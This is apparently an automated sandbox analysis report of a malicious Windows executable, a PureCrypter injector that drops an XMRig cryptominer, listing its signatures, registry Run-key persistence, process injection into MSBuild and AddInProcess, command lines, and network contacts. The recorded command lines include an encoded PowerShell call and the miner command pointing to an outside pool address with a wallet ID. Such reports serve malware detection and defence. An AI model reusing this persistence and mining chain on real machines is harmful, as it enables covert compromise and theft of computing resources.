Analysis Overview
SHA256
14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb
Threat Level: Known bad
The file 14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb was found to be: Known bad.
Malicious Activity Summary
Detect PureCrypter injector
PureCrypter
xmrig
XMRig Miner payload
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-03 20:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-03 20:49
Reported
2023-02-03 20:52
Platform
win10-20220812-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Detect PureCrypter injector
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
PureCrypter
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\cloudapp = "\"C:\\Users\\Admin\\AppData\\Local\\WinSCP\\cloudapp.exe\"" | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3824 set thread context of 4844 | N/A | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe |
| PID 4844 set thread context of 3404 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe
"C:\Users\Admin\AppData\Local\Temp\14d6746a7475a0f8cd26d1d30403688e8d36cdc3f093e159f5882dc614a0cccb.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 45.142.122.11:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 163.123.142.210:80 | 163.123.142.210 | tcp |
| US | 20.44.10.123:443 | N/A | tcp |
| US | 209.197.3.8:80 | N/A | tcp |
| IT | 179.43.155.202:9090 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| RU | 45.142.122.11:8080 | N/A | tcp |
Files
memory/3824-120-0x000002015AF00000-0x000002015AF2E000-memory.dmp
memory/3824-121-0x00000201755D0000-0x00000201758BA000-memory.dmp
memory/3824-122-0x000002015B320000-0x000002015B342000-memory.dmp
memory/4848-123-0x0000000000000000-mapping.dmp
memory/4848-130-0x000001EAC3F90000-0x000001EAC4006000-memory.dmp
memory/3824-138-0x00000201759F0000-0x0000020175AAC000-memory.dmp
memory/4844-139-0x0000000000400000-0x000000000048C000-memory.dmp
memory/4844-140-0x0000000000400000-mapping.dmp
memory/4844-141-0x0000022D77E10000-0x0000022D77EAE000-memory.dmp
memory/4844-142-0x0000022D75BB0000-0x0000022D75C06000-memory.dmp
memory/4844-143-0x0000022D775E0000-0x0000022D7762C000-memory.dmp
memory/4844-144-0x0000022D75C90000-0x0000022D75CA6000-memory.dmp
memory/3404-145-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-146-0x0000000140344454-mapping.dmp
memory/3404-147-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-148-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-149-0x0000020A13110000-0x0000020A13130000-memory.dmp
memory/3404-150-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-151-0x0000020A14AD0000-0x0000020A14AF0000-memory.dmp
memory/3404-152-0x0000000140000000-0x00000001407CA000-memory.dmp
memory/3404-153-0x0000020A14AF0000-0x0000020A14B10000-memory.dmp
memory/3404-154-0x0000020A14AF0000-0x0000020A14B10000-memory.dmp